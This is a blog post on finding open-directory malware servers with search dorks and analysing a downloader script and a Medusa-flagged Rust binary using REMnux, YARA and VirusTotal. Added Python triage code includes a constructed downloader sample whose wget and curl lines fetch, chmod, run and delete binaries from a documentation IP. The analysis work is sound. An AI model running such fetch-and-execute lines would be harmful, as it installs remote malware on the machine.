
Malware hunting with REMnux

· 4 min read
Strider

Hello! I thought I would write a blog post about searching for malware servers and analyzing the malware files they host with REMnux.

There is a big community of security researchers and malware hunters who search for malware servers and analyze the files found on them. You can support them by searching for such servers and their malicious content yourself. You can also post your findings on social media: a researcher may be able to analyze a sample for you if you can't, or create signatures that benefit the whole community.

info

Disclaimer: When doing this, you can mess up your system or network. Please treat it with caution. I accept no liability for any damage that may occur.

Prerequisites

  • A computer used only for this purpose.
  • REMnux, which can be downloaded here
  • If you run it as a VM, VMware or VirtualBox is needed
  • If you run it as a container, Docker is needed

I will use the Docker version of REMnux as my toolbox.

How do I start?

Well, that's a good question. A good starting point for finding those servers is to look on social media for hashtags like #opendir, #malware, #c2 and so on. This gives you a small overview of how the files tend to be named and which keywords are worth feeding into search engines like Google, Shodan or fofa.info.

Here is a small overview of dorks and queries:

Google

intitle:"Index of" <keyword>
intitle:"Index of" bins.sh
...
intitle:index of intext:"Last modified"
intitle:"Index of" intext:"Last modified"
...

Shodan.io

"category:malware"
http.title:"Index of /"
http.title:"Directory listing for /"

Fofa.info

title="Index of /" && body=".exe"
server="SimpleHTTP/*" && title=="Directory listing for /"
server="SimpleHTTP/*" && title=="Directory listing for /" && body=".exe"
server="SimpleHTTP/*" && title=="Directory listing for /" && body=".sh"

Target malware server

Here, as an example, we see a web server with directory listing enabled. The directory contains some malicious files. To avoid getting hacked by the server's operators, the screenshot is cropped.

img1

Here we see five interesting files; the first one I want to analyze is bins.sh.

A closer look at the shell script

img2

The content of bins.sh looks like a downloader: it tries to download every binary on the server and execute each one. For each binary it first looks for a writable directory to download into, then downloads the binary, makes it executable and runs it. After the binary has been started, the file is deleted to cover its tracks, but because it was already executed, the malware keeps running in memory. OK, let's download one of the binaries and find out what we have. I downloaded the binary client-x86_64-unknown-linux-gnu into my REMnux container.
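When you pull a script like this from an open directory, the first thing worth automating is listing what it fetches and confirming the fetch / chmod / run / delete cycle without executing anything. The following is an added example, not code from the original post: SAMPLE is a constructed script that mirrors the pattern described above (the real bins.sh is only shown in the screenshot), 203.0.113.10 is a documentation address rather than the server from the post, and the binary names are made up.

```python
"""Static triage of a bins.sh-style downloader script.

Added example, not code from the original post. SAMPLE is a constructed script
that mirrors the pattern described above (probe for a writable directory, fetch
each binary, chmod +x, run it, delete it); 203.0.113.10 is a documentation
address, not the server from the post, and the binary names are made up.
"""
import json
import re
import shlex

SAMPLE = r"""#!/bin/sh
# constructed sample, not the real bins.sh
for d in /tmp /var/run /mnt /dev/shm; do cd $d && [ -w $d ] && break; done
wget http://203.0.113.10/bins/client-x86_64-unknown-linux-gnu -O .x; chmod +x .x; ./.x; rm -f .x
curl -s http://203.0.113.10/bins/client-arm-unknown-linux-gnueabi -o .x; chmod +x .x; ./.x; rm -f .x
"""

URL_RE = re.compile(r"https?://[^\s'\";|&]+")
# commands that mark each stage of the fetch -> chmod -> run -> delete cycle
STAGES = {
    "fetch": ("wget", "curl", "tftp", "ftpget"),
    "mark_exec": ("chmod",),
    "delete": ("rm",),
}


def extract_urls(script: str) -> list:
    """Every http(s) URL in the script, in order, without duplicates."""
    urls = []
    for m in URL_RE.finditer(script):
        if m.group(0) not in urls:
            urls.append(m.group(0))
    return urls


def split_commands(script: str) -> list:
    """Break the script into tokenised simple commands; comments are dropped."""
    cmds = []
    for line in script.splitlines():
        line = line.split("#", 1)[0]
        for part in re.split(r"\|\||&&|;|\|", line):
            toks = shlex.split(part)
            if toks:
                cmds.append(toks)
    return cmds


def triage(script: str) -> dict:
    """Summarise what the script fetches, runs and cleans up, without running it."""
    stages = {name: 0 for name in STAGES}
    executed = set()
    probes_writable = False
    for toks in split_commands(script):
        head = toks[0]
        for name, commands in STAGES.items():
            if head in commands:
                stages[name] += 1
        if head.startswith("./"):          # runs a dropped file from the cwd
            executed.add(head)
        if head == "[" and "-w" in toks:   # test -w: looking for a writable dir
            probes_writable = True
    urls = extract_urls(script)
    hosts = sorted({u.split("/")[2] for u in urls})
    return {
        "urls": urls,
        "hosts": hosts,
        "stages": stages,
        "executed": sorted(executed),
        "probes_writable_dir": probes_writable,
        "self_deleting": stages["delete"] > 0,
        "verdict": "downloader" if stages["fetch"] and executed else "unknown",
    }


if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE), indent=2))
```

The URL list is what you feed into the next step (fetching each binary into the REMnux container, with a user agent and source address you are happy to burn), and the host list tells you whether all payloads come from the same open directory or a second server is involved.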

A closer look at the binary

Note: I don't decompile it, nor do I want to go into detailed reversing with dedicated tools here.

img4

With the tool Detect-It-Easy we see that it is a Rust binary. Let's try to get some hits with YARA:

yara /usr/local/yara-rules/*_index.yar -m -s -f client-x86_64-unknown-linux-gnu

This runs every rule index preinstalled in REMnux against the sample (-m prints the rule metadata, -s the matched strings, -f enables fast matching). Here are some of the results:

img4

By running strings we see that the binary calls back to the same server on a different port. It looks like the binary connects back and receives commands in JSON format, possibly over UDP.

img5
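The strings run above is the step that gives you the callback endpoint, so it is worth scripting: extract the printable strings, pull out anything that looks like an IP:port pair, JSON keys and transport keywords, and flag whether the endpoint matches the host the sample was downloaded from. The following is an added example, not code from the original post; BLOB is a constructed byte string standing in for the Rust client (the real sample's strings only appear in the screenshot), and 203.0.113.10 is a documentation address.

```python
"""Pull callback indicators out of the printable strings of a binary.

Added example, not code from the original post. BLOB is a constructed byte
string standing in for the Rust client binary; 203.0.113.10 is a documentation
address. The real sample's strings are only shown in the screenshot.
"""
import re

BLOB = (
    b"\x7fELF\x02\x01\x01" + b"\x00" * 16
    + b"203.0.113.10:4433\x00"                  # same host as the listing, new port
    + b"\x90\x90\x00"
    + b'{"cmd":"exec","args":[],"id":0}\x00'   # JSON-shaped task
    + b"failed to bind UDP socket\x00"
    + b"/usr/bin/rustc\x00rust_panic\x00"
    + b"\x01\x02\x03"
)

IP_PORT = re.compile(r"\b((?:\d{1,3}\.){3}\d{1,3}):(\d{1,5})\b")
JSON_KEY = re.compile(r'"([A-Za-z_][A-Za-z0-9_]*)"\s*:')
TRANSPORT = re.compile(r"\b(udp|tcp|https?|tls)\b", re.I)


def strings(data: bytes, minlen: int = 4) -> list:
    """Runs of at least minlen printable ASCII bytes, like the strings tool."""
    pattern = rb"[\x20-\x7e]{%d,}" % minlen
    return [m.group(0).decode("ascii") for m in re.finditer(pattern, data)]


def callback_indicators(data: bytes, server_host: str = "") -> dict:
    """Endpoints, JSON keys and transport hints; flags a callback to server_host."""
    found = strings(data)
    endpoints = [(ip, int(port)) for s in found for ip, port in IP_PORT.findall(s)]
    return {
        "endpoints": endpoints,
        "calls_back_to_server": any(ip == server_host for ip, _ in endpoints),
        "json_keys": sorted({k for s in found for k in JSON_KEY.findall(s)}),
        "transport_hints": sorted({t.lower() for s in found for t in TRANSPORT.findall(s)}),
        "rust_markers": [s for s in found if "rust" in s.lower()],
    }


if __name__ == "__main__":
    for key, value in callback_indicators(BLOB, "203.0.113.10").items():
        print(f"{key}: {value}")
```

The IP:port and transport hints are only hints: a string like "UDP" next to an endpoint suggests the protocol, but confirming it still needs a packet capture or a look at the socket calls, which is exactly what this post skips.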

Virustotal scan & results

Now I scan the bins.sh file with vt-cli, which can be found at https://github.com/VirusTotal/vt-cli.

img6

Submitting bins.sh with vt-cli gives us a Base64 string, the analysis ID. When we request that analysis, we get a report back whose status is still queued.

Well, let's decode the Base64 string so we can look the sample up on the VirusTotal website itself.

echo ZDMyNDFmOWU2Nzg3NzliYTI0YmM4YmMzYjczOTlhZjY6MTcwNzU3MDMzOQ== | base64 -d
d3241f9e678779ba24bc8bc3b7399af6:1707570339

The first part of the decoded string is an MD5 hash, which we can use to look the file up on VirusTotal; the part after the colon is a Unix timestamp of the submission.
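Decoding these IDs by hand gets old quickly, so here is the same step as a small function, added here and not part of the original post or of vt-cli: it decodes the ID, checks that the first field really is a 32-character hex MD5 and that the second is numeric, converts the timestamp to UTC, and builds the VirusTotal URL to open. The analysis ID is the one from the post; reading the second field as a Unix timestamp is my interpretation.

```python
"""Decode a vt-cli analysis ID into its MD5 and submission time.

Added example, not code from the original post or from vt-cli. ANALYSIS_ID is
the value from the post; treating the second field as a Unix timestamp is an
interpretation, not something vt-cli documents on this page.
"""
import base64
import re
from datetime import datetime, timezone

ANALYSIS_ID = "ZDMyNDFmOWU2Nzg3NzliYTI0YmM4YmMzYjczOTlhZjY6MTcwNzU3MDMzOQ=="


def decode_analysis_id(analysis_id: str) -> dict:
    """Split base64("<md5>:<timestamp>") and sanity-check both halves."""
    raw = base64.b64decode(analysis_id, validate=True).decode("ascii")
    digest, sep, stamp = raw.partition(":")
    if sep != ":" or not re.fullmatch(r"[0-9a-f]{32}", digest) or not stamp.isdigit():
        raise ValueError(f"not an md5:timestamp analysis id: {raw!r}")
    submitted = datetime.fromtimestamp(int(stamp), tz=timezone.utc)
    return {
        "md5": digest,
        "submitted_utc": submitted.strftime("%Y-%m-%d %H:%M:%S"),
        "gui_url": "https://www.virustotal.com/gui/file/" + digest,
    }


if __name__ == "__main__":
    print(decode_analysis_id(ANALYSIS_ID))
```

Opening the gui_url with the MD5 works because VirusTotal redirects to the SHA-256 form of the link, as the next step shows; from the terminal, `vt file <md5>` fetches the same report.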

Entering the hash redirects us to this link (VirusTotal switches to the SHA-256 of the file): https://www.virustotal.com/gui/file/3f19cab6ac8e62cd117c8039c793a69f311d9a131c6592bb6c2eb18c76fc7ffd

img7

Here we see that the file is flagged as malicious, and the detection names tell us we have found Medusa ransomware / botnet malware.

info

I submitted all files to VirusTotal after writing this blog post. May it help other security researchers and professionals.

I hope you liked it and had fun 😄